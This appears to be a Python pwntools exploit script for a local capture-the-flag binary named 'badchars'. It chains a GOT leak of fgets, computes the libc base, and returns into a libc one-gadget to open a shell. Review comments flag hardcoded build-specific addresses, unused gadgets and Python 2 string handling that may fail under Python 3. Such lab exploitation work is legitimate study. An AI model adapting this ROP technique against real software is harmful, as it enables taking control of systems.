#import pwntools
from pwn import *
# Flat exploit script for the local './badchars' binary: a two-stage ROP chain
# that first leaks a libc address through the GOT and then returns into a
# libc one-gadget. Every address below is specific to this binary build and
# the libc it was run with; the script does no check of the payload bytes
# against any filtered ("bad") characters despite the name.
# NOTE(review): str and bytes are mixed freely ("A"*40 + p64(...),
# leak.strip("\x0a")), so this assumes a str-returning (Python 2-era)
# pwntools -- confirm before running under Python 3.
#initialize the process
target=process('./badchars')
#define the elf used
elf=ELF('./badchars')
#find the libc used by the elf
libc=elf.libc
#print initial data (everything up to the prompt "s\n> ")
print(target.recvuntil("s\n> "))
#construct first ROPchain
#initial payload: 40 bytes of filler before the chain starts
payload="A"*40
#gadgets,got and plt values
# These are fixed addresses, so the binary is presumably built without PIE
# and with a readable GOT (no full RELRO) -- confirm with checksec. Either
# mitigation would break this chain. poprsir15 and system_plt are defined
# but never used below.
poprdi=0x400b39
poprsir15=0x400b41
fgets_got=0x601048
system_plt=0x4006f0
puts_plt=0x4006e0
pwnme=0x4008f5
one_gadget=0xe652b
#leak address of fgets in randomized libc: pop rdi <- fgets@got ; call puts@plt
payload+=p64(poprdi)
payload+=p64(fgets_got)
payload+=p64(puts_plt)
#return to pwnme so a second chain can be delivered after the leak
payload+=p64(pwnme)
# trailing zero qword; its role is not documented here
payload+=p64(0x0)
#send first payload
target.sendline(payload)
#recv the leak and unpack as a 64-bit address
# puts prints the pointer up to its first zero byte followed by "\n", so the
# line is stripped and zero-padded back to 8 bytes before u64()
leak=target.recvuntil("\x0a")
leak=leak.strip("\x0a")
libc_fgets=u64(leak+"\x00"*(8-len(leak)))
#get libc base address and address of execve("/bin/sh",NULL,NULL)
# libc.symbols["fgets"] is the offset of fgets inside the resolved libc;
# one_gadget is an offset into that same libc build and will not hold for
# any other build
libc_base=libc_fgets-libc.symbols["fgets"]
libc_gadget=libc_base+one_gadget
#print libc addresses
print(hex(libc_fgets))
print(hex(libc_base))
#second ROPchain
#initial payload (same 40-byte filler as the first stage)
payload="A"*40
# call execve("/bin/sh",NULL,NULL)
payload+=p64(libc_gadget)
#send the second payload
target.sendline(payload)
#interact with the spawned shell
target.interactive()